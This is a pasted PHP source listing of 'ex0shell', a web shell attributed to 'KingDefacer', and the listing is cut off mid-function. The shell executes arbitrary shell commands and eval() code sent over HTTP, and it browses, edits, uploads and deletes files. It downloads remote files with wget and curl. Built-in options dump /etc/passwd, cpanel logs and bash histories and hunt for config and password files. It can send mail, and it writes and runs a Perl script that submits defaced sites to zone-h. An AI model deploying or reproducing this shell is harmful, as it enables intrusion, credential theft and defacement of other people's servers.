ex0shell

SUBMITTED BY: nabz

DATE: Jan. 25, 2017, 4:57 p.m.

FORMAT: Text only

SIZE: 42.6 kB

Raw Download

HITS: 153

Report
  1. <?
  3. /*###########################################
  5. exoshell volume 2.1S
  7. Maked In Turk Edited And Translated By KingDefacer
  9. ###########################################*/
  11. error_reporting(0);
  13. set_magic_quotes_runtime(0);
  15. if(version_compare(phpversion(), '4.1.0') == -1)
  17. {$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
  19. $_SERVER = &$HTTP_SERVER_VARS;
  21. }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
  23. if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
  25. elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
  27. else{return $requ."?".$link."=".$val;}}
  29. function delm($delmtxt){print"<center><table bgcolor=Black style='border:1px solidDeepSkyBlue ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";}
  31. function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
  33. $nscmd=htmlspecialchars($scmd);print $nscmd;}
  35. elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
  37. $ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
  39. elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
  41. while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
  43. print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
  45. ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
  47. ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
  49. print htmlspecialchars($pret);}}
  51. function input($type,$name,$value,$size)
  53. {if (empty($value)){print "<input type=$type name=$name size=$size>";}
  55. elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
  57. elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
  59. else {print "<input type=$type name=$name value=$value size=$size >";}}
  61. function permcol($path){if (is_writable($path)){print "<font color=red>";
  63. callperms($path); print "</font>";}
  65. elseif (!is_readable($path)&&!is_writable($path)){print "<font color=DeepSkyBlue >";
  67. callperms($path); print "</font>";}
  69. else {print "<font color=DeepSkyBlue >";callperms($path);}}
  71. if ($dlink=="dwld"){download($_REQUEST['dwld']);}
  73. function download($dwfile) {$size = filesize($dwfile);
  75. @header("Content-Type: application/force-download;name=$dwfile");
  77. @header("Content-Transfer-Encoding: binary");
  79. @header("Content-Length: $size");
  81. @header("Content-Disposition: attachment; filename=$dwfile");
  83. @header("Expires: 0");
  85. @header("Cache-Control: no-cache, must-revalidate");
  87. @header("Pragma: no-cache");
  89. @readfile($dwfile); exit;}
  91. ?>
  93. <html>
  95. <head><title>ex0shell Shell & Edited By KingDefacer</title></head>
  97. <style>
  99. BODY {font-family:tahoma; SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; }
  101. a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
  103. a:hover{color:red}
  105. input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
  107. textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
  109. div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue smoke}
  111. select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
  113. <body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3>
  115. </body>
  117. </html>
  119. <?
  121. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
  123. $sf="<form method=post>";$ef="</form>";
  125. $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
  127. $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
  129. $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
  131. $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
  133. $sfnt="<font face=tahoma size=2 color=DeepSkyBlue >";$efnt="</font>";
  135. ################# Ending of common variables ########################
  137. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=DeepSkyBlue size=6> ## ex0 shell EDITED BY KingDefacer ##
  139. </font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
  141. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('dlink', 'home').">Home</a>";
  143. print " - <a href='javascript:history.back()'>Back</a>";
  145. print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">phpinfo</a>";
  147. if ($dlink=='phpinfo'){print phpinfo();die();}
  149. print " - <a href=".inclink('dlink', 'basepw').">Base64 decode</a>";
  151. print " - <a href=".inclink('dlink', 'urld').">Url decode</a>";
  153. print " - <a href=".inclink('dlink', 'urlen').">Url encode</a>";
  155. print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
  157. print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Check permissions</a>";
  159. print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>File source</a>";
  161. print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>Quick index</a>";
  163. print " - <a href=".inclink('dlink', 'zone')."&scdir=$nscdir>Zone-h</a>";
  165. print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
  167. print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd help</a>";
  169. if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));
  171. print "<p>Result is : $sfnt".$cbase."$efnt"; die();}
  173. if ($dlink=="basepw"){ print "<p><b>[ Base64 - Decoder ]</b>";
  175. print $sf;input ("text","ncbase",$ncbase,35);print " ";
  177. input ("submit","","Decode","");print $ef; die();}
  179. if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld']));
  181. print "<p>Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){
  183. print "<p><b>[ Url - Decoder ]</b>"; print $sf;
  185. input ("text","nurld",$nurld,35);print " ";
  187. input ("submit","","Decode","");print $ef; die();}
  189. if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "<p>Result is : $sfnt".$urlenc."$efnt"; die();}
  191. if ($dlink=='urlen'){print "<p><b>[ Url - Encoder ]</b>";
  193. print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();}
  195. if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf']));
  197. print "<p>Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){
  199. print "<p><b>[ MD5 - Encoder ]</b>";
  201. print $sf;input ("text","nmdf",$nmdf,35);print " ";
  203. input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef;
  205. print "<pre>";print "<p><textarea cols=120 rows=12>";
  207. if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls');
  209. }elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls');
  211. }print "</textarea>";print "</pre>";die();}
  213. function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){
  215. print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
  217. elseif(isset($showsc)&&filesize($showsc) !=="0") {
  219. print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
  221. if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
  223. print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
  225. input ("text","showsc","",35);print " ";
  227. input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
  229. if ($dlink=='cmdhlp'){
  231. print "<p><b>: Insert the command below to get help or to know more about it's uses :";print "<form method=get>";
  233. input ("text","hlp","",35);print " ";
  235. input ("submit","","Help","");print $ef; die();}
  237. if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
  239. print "<p><b>[ The command is $sfnt".$hlp."$efnt ]";
  241. $hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
  243. if (!function_exists(shell_exec)&&!function_exists(exec)&&
  245. !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
  247. {print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=black>";
  249. if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";}print "</pre></font>";}print "</td></tr></table>";die();}
  251. if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
  253. {if (touch ($_REQUEST['indx'])==true){
  255. $fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
  257. fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
  259. ] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
  261. if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
  263. print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
  265. Your index contents here</textarea></p>";
  267. input ("text","indx","Index-name",35);print " ";
  269. input ("submit","qindsub","Create","");print $ef;die();}
  271. if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
  273. $mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
  275. if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
  277. if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
  279. print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
  281. Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
  283. input ("submit","mailsub","Send-mail","");print $ef;die();}
  285. if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
  287. function callzone($nscdir){
  289. if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
  291. else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
  293. fwrite ($fpz,"\$arq = @ARGV[0];
  295. \$grupo = @ARGV[1];
  297. chomp \$grupo;
  299. open(a,\"<\$arq\");
  301. @site = <a>;
  303. close(a);
  305. \$b = scalar(@site);
  307. for(\$a=0;\$a<=\$b;\$a++)
  309. {chomp \$site[\$a];
  311. if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
  313. print \"[+] Sending \$site[\$a]\n\";
  315. use IO::Socket::INET;
  317. \$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
  319. print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
  321. print \$sock \"Accept: */*\r\n\";
  323. print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
  325. print \$sock \"Accept-Language: pt-br\r\n\";
  327. print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
  329. print \$sock \"Connection: Keep-Alive\r\n\";
  331. print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
  333. print \$sock \"Host: old.zone-h.org\r\n\";
  335. print \$sock \"Content-Length: 385\r\n\";
  337. print \$sock \"Pragma: no-cache\r\n\";
  339. print \$sock \"\r\n\";
  341. print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
  343. close(\$sock);}");
  345. if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
  347. }else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
  349. if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
  351. {print "[ Can't complete the operation !! ]";}
  353. else {callfuncs("chmod 777 $zpl;chmod 777 $li");
  355. ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
  357. print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
  359. }if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
  361. print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
  363. www.site1.com
  365. www.site2.com
  367. </textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
  369. input ("submit","zonesub","Send","");print $ef;die();}
  371. print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
  373. function inisaf($iniv) { $chkini=ini_get($iniv);
  375. if(($chkini || strtolower($chkini)) !=='on'){print"<font color=green ><b>OFF ( NOT SECURITY )</b></font>";} else{
  377. print"<font color=red><b>Acik ( Guvenli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
  379. if ($chkin==""){print " <font color=red><b>None</b></font>";}
  381. else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=DeepSkyBlue >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
  383. elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
  385. while (!feof($opop)){ $nval= fgetc($opop);}}
  387. elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
  389. ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
  391. if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
  393. else{print"<font color=DeepSkyBlue ><b>OFF</b></font>";} }
  395. print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
  397. print"<tr><td>"; print"<center><br>";
  399. print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>";
  401. if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>";
  403. print "<div align=center>"; print"<br><b>Mysql : </b>";
  405. callocmd('which mysql','/usr/bin/mysql');
  407. print"</td>"; print"<td>"; print"<br><b>Perl : </b>";
  409. callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>";
  411. callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>";
  413. print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>";
  415. callocmd('which GET','/usr/bin/GET');
  417. print"</td>"; print"<td>";print"<br><b>Wget : </b>";
  419. callocmd('which wget','/usr/bin/wget');
  421. print"</td>"; print"<td>"; print"<br><b>Lynx : </b>";
  423. callocmd('which lynx','/usr/bin/lynx');
  425. print"</td>"; print "</tr></table>"; }print "<hr><br>";
  427. print "<b>YOUR IP: ".$REMOTE_ADDR."<br></b>";
  429. print "<b>Server IP : ".$SERVER_ADDR."</b>";
  431. print"<br><b>".$SERVER_SIGNATURE."</b>";
  433. print "<b>Server NAME : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>";
  435. print "<b>Disabled Functions : </b>";inifunc(disable_functions);print"<br>";
  437. print "<b>Your Infos : <b>"; callfuncs('id');print"<br><b>Os : </b>";
  439. if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
  441. if (!function_exists(shell_exec)&&!function_exists(exec)&&
  443. !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
  445. {print php_uname(); print "/";print PHP_OS;}
  447. else {callfuncs('uname -a');}}print"<br>";
  449. print"Php-Version : ".phpversion(); print"<br><b>Current-path : </b>";
  451. print $nscdir."&nbsp;&nbsp;&nbsp;&nbsp; [ ";permcol($nscdir);print " ]";
  453. print"<br>";print "Your shells location : " .__file__;
  455. print"<br> Disc Spase: "; readable_size(disk_total_space($nscdir));print " / ";
  457. print"Bos Alan: "; readable_size(disk_free_space($nscdir));
  459. print "</center><br></font>"; print"</td></tr></table><br>";
  461. if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']);
  463. if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
  465. else{$mess="Make Dir/ Delete";}}elseif (isset($_REQUEST['deldir']))
  467. { $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}}
  469. else{$mess="Make Dir/ Delete";}if(isset($_REQUEST['crefile'])){
  471. $ncfile=trim($_REQUEST['cfile']);
  473. if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);}
  475. else{ $mess3= "Make a File/ Delete";}}
  477. elseif(isset($_REQUEST['delfile'])){
  479. $ndfile=trim($_REQUEST['cfile']);
  481. if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";}
  483. else {$mess3= "Make Dir/ Delete";}}
  485. else {$mess3="Make a File/ Delete";}
  487. class upload{ function upload($file,$tmp){
  489. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
  491. if (@copy($tmp,$nscdir."/".$file)){
  493. print "<div><center><b>:<font color=DeepSkyBlue > $file </font>uploaded successfully :</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } }
  495. $obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
  497. $ustname=trim ($_REQUEST['ustname']);ob_start();
  499. if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
  501. if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
  503. if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
  505. if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
  507. if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
  509. if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
  511. if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
  513. if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
  515. if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
  517. if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
  519. !isset($_REQUEST['rfiletxt'])){
  521. if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){
  523. $files[] = $filename; sort($files);}print "<br>";
  525. print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>";
  527. print "<tr><td width=43% style=\"border:1px solid black\">";
  529. print "<center><b>Files";print "</td>";
  531. print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Size";print "</td>";
  533. print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Write";print "</td>";
  535. print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Read";print "</td>";
  537. print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Type";print "</td>";
  539. print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Edit";print "</td>";
  541. print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Rename";print "</td>";
  543. print "<td width=6% style=\"border:1px solid black\">";print "<center><b>Download";print "</td>";if(strstr(PHP_OS,"Linux")){
  545. print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Owner";print "</td>";}
  547. print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Permission";print "</td></tr>"; foreach ($files as $nfiles){
  549. if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
  551. if (is_writable("$nscdir/$nfiles")){
  553. $scmess2= "<center><font color=DeepSkyBlue >yes";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){
  555. $scmess3= "<center><font color=DeepSkyBlue >yes";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Dir";}else{$scmess4= "<center><font color=DeepSkyBlue >File";}
  557. print"<tr><td style=\"border:1px solid black\">";
  559. if (is_dir($nfiles)){print "<font face= tahoma size=2 color=DeepSkyBlue >[ $nfiles ]<br>";}else {print "<font face= tahoma size=2 color=#dadada>$nfiles <br>";}
  561. print"</td>"; print "<td style=\"border:1px solid black\">";
  563. print "<center><font face= tahoma size=2 color=#dadada>";
  565. if (is_dir("$nscdir/$nfiles")){print "<b>K</b>Dir";}
  567. elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
  569. print "</td>"; print "<td style=\"border:1px solid black\">";
  571. print "<center><font face= tahoma size=2 >$scmess2"; print "</td>";
  573. print"<td style=\"border:1px solid black\">";
  575. print "<center><font face= tahoma size=2 >$scmess3"; print "</td>";
  577. print "<td style=\"border:1px solid black\">";
  579. print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
  581. print "<td style=\"border:1px solid black\">";if(is_file("$nscdir/$nfiles")){
  583. print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Edit</a>";}else {print "<center><font face=tahoma size=2 color=gray>Düzenle</center>";}print"</td>"; print "<td style=\"border:1px solid black\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Rename</a>";print"</td>";print "<td style=\"border:1px solid black\">";
  585. if(is_file("$nscdir/$nfiles")){
  587. print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>Download</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
  589. print "<td style=\"border:1px solid black\">";
  591. print "<center><font face=tahoma size=2 color=#dadada>";owgr($nfiles);
  593. print "</center>";print"</td>";}
  595. print "<td style=\"border:1px solid DeepSkyBlue \">";print "<center><div>";
  597. permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>";
  599. }print "</table>";print "<br>";}else {print "<div><br><center><b>[ Can't open the Dir, permission denied !! ]<p>";}}
  601. elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
  603. if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
  605. print "<pre><center>".$sta;
  607. if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
  609. elseif(isset($_REQUEST['eval'])){
  611. ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
  613. $ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
  615. elseif (isset($_REQUEST['subqcmnds'])){
  617. if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
  619. if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
  621. if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
  623. if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
  625. if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
  627. if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
  629. if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
  631. if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
  633. if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
  635. if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
  637. if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
  639. if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
  641. if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
  643. }print $eta."</center></pre>";}
  645. function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
  647. if(is_readable($rfile)&&is_file($rfile)){
  649. $fp=fopen ($rfile,"r");print"<center>";
  651. print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Back </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>";
  653. print $sf."<textarea cols=157 rows=23 name=rfiletxt>";
  655. while (!feof($fp)){$lines = fgetc($fp);
  657. $nlines=htmlspecialchars($lines);print $nlines;}
  659. fclose($fp);print "</textarea>";if (is_writable($rfile)){
  661. print "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else
  663. {print "<div><b><center>[ Can't edit <font color=DeepSkyBlue >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
  665. elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ You selected a wrong file name or you don't have access !! ]</center></b></div><br>";}}
  667. function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);
  669. if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");
  671. $rfiletxt=stripslashes($_REQUEST['rfiletxt']);
  673. fwrite ($rffp,$rfiletxt);print "<div><b><center>
  675. [ <font color=DeepSkyBlue >".basename($hidrfile)."</font> Saved !! ]
  677. [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
  679. </center></b></div><br>";fclose($rffp);}
  681. else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}}
  683. if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}
  685. elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}
  687. function callperms($chkperms){
  689. $perms = fileperms($chkperms);
  691. if (($perms & 0xC000) == 0xC000) {
  693. // Socket
  695. $info = 's';
  697. } elseif (($perms & 0xA000) == 0xA000) {
  699. // Symbolic Link
  701. $info = 'l';
  703. } elseif (($perms & 0x8000) == 0x8000) {
  705. // Regular
  707. $info = '-';
  709. } elseif (($perms & 0x6000) == 0x6000) {
  711. // Block special
  713. $info = 'b';
  715. } elseif (($perms & 0x4000) == 0x4000) {
  717. // Directory
  719. $info = 'd';
  721. } elseif (($perms & 0x2000) == 0x2000) {
  723. // Character special
  725. $info = 'c';
  727. } elseif (($perms & 0x1000) == 0x1000) {
  729. // FIFO pipe
  731. $info = 'p';
  733. } else {
  735. // Unknown
  737. $info = 'u';
  739. }
  741. // Owner
  743. $info .= (($perms & 0x0100) ? 'r' : '-');
  745. $info .= (($perms & 0x0080) ? 'w' : '-');
  747. $info .= (($perms & 0x0040) ?
  749. (($perms & 0x0800) ? 's' : 'x' ) :
  751. (($perms & 0x0800) ? 'S' : '-'));
  753. // Group
  755. $info .= (($perms & 0x0020) ? 'r' : '-');
  757. $info .= (($perms & 0x0010) ? 'w' : '-');
  759. $info .= (($perms & 0x0008) ?
  761. (($perms & 0x0400) ? 's' : 'x' ) :
  763. (($perms & 0x0400) ? 'S' : '-'));
  765. // World
  767. $info .= (($perms & 0x0004) ? 'r' : '-');
  769. $info .= (($perms & 0x0002) ? 'w' : '-');
  771. $info .= (($perms & 0x0001) ?
  773. (($perms & 0x0200) ? 't' : 'x' ) :
  775. (($perms & 0x0200) ? 'T' : '-')); print $info;}
  777. function readable_size($size) {
  779. if ($size < 1024) {
